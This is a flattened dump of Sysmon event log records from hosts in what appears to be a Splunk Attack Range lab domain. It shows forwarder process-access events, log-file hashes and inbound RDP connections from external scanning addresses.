Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58ABBF64DCFF4D2C824192DB7EA43C24,SHA256=4264459FD7A2747C309163E2BD2E3BA1536254900E002469230B25767C47257B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.390{A7A01FEF-EBBF-607E-AC0B-00000000BB01}63844448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000073395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.359{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=3E5860DADF3E5BA0E31F17C9D30814D1,SHA256=65029C3909B20B9E580DD7E902A136126F0C8E819D6198714D04B985982706B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.234{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBBF-607E-AC0B-00000000BB01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.234{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.234{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.234{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.234{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.234{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBBF-607E-AC0B-00000000BB01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.234{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBBF-607E-AC0B-00000000BB01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000073387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.234{A7A01FEF-EBBF-607E-AC0B-00000000BB01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000073412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:04.874{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB07ED30EB403B33911C5485D57C1FA7,SHA256=86969276D3D39B60A375865304D394CB941FA17ECAC58416800C8640782E7F79,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.864{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-3906-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:04.749{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66C6225122C78345CDE00317CCE47960,SHA256=77E958EC67291B9F46369D3EE1CAE1ED9A24253E2D709FD5445D49E357F63097,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:04.374{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=92455B559190D617D1AD847A90A4E4AA,SHA256=641730E1E6AF9CB5CDD3E2F4A1F7B8180B1EAA802DCACC49952E576C362064FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050210Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:04.676{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C9DCE80E521D3F01B950C4BC87E5FA6A,SHA256=D75B11F97D35673D7EFB78A43982E229E412C3DB653052C40AA6A49EAC0C637A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050209Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:02.501{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53615-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050208Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:02.189{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63471-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050207Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:04.348{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5390E23D5D8CD04AB04020225CD36C86,SHA256=0D0154CA5A068B1F43D2B171956503FA91EB677EE3C65AF9DA04977C1847E22C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:04.270{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-5271-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:04.238{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-8001-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:05.890{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4200E7A643E749BD9AF0ECA079BBF74,SHA256=D8D5E09E1A3482487830BEBE0A03AD9F8E7B06C4A5110B02EA2712412918085D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:05.780{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF9D1C2BE7D633088440A082721627A2,SHA256=F6B862D9D35C484AA656877E12473F8494ECFF98217A6E45A229FD57588A1265,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:05.390{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=7C797CE1DF07B32E3F689D96E0551BD4,SHA256=7EF6ABDE504CB624035CC4418EFE06962161B65EE1DE013218777A90048A5AE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050211Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:05.379{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5D6F8098FCD8D51AF6A9A494683F512,SHA256=F16030AFE5FB6BE866BF18943C5248A51435ABC3328E653E7C510805ACB0F801,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:05.173{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com49424-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:06.827{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3027CF44C13C6FB07422741255F4FB25,SHA256=3E9BF79863A0697D4F776737A43FB15A96A3F6B0EB386AE795D0717FC307B90B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:06.421{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=D101444E4489807169D53FB1BD986E07,SHA256=310A68FE47575EEEAC0C126E290E76BE2C7F6A878B173B9CA23F686EFF13F7E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050215Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:04.783{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52519-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050214Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:04.047{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55086-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050213Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:06.688{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC0155A200D699C5552682E4F42BCFAD,SHA256=07066A9A203D188948CCCFA87678D06562E86696F3820722A584DB3C68F93AAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050212Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:06.391{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9E2EDABDD92D2501DA33178D6602F2A,SHA256=A3ED0C133071A44317B6882854C2011EEF507DB8D5BE720FDAF24199E7DE3697,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:06.161{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57529-false10.0.1.12-8000- 23542300x800000000000000073430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:07.843{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E09DB2B11FFC5CE246FAA31E771A698D,SHA256=FBF256C774FBE65A4DB3059085C5350B7CC482343B191936B23E4A002C71AE32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:07.452{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E88D9EE9C85081E481F087C3F618D72F,SHA256=C80B22A31F9D470F595B6CCAC84C40A27985EB83D841CF0E5F0DB40F7F3A4536,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:07.296{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBC3-607E-AE0B-00000000BB01}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:07.296{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:07.296{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:07.296{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:07.296{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:07.296{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBC3-607E-AE0B-00000000BB01}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:07.296{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBC3-607E-AE0B-00000000BB01}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 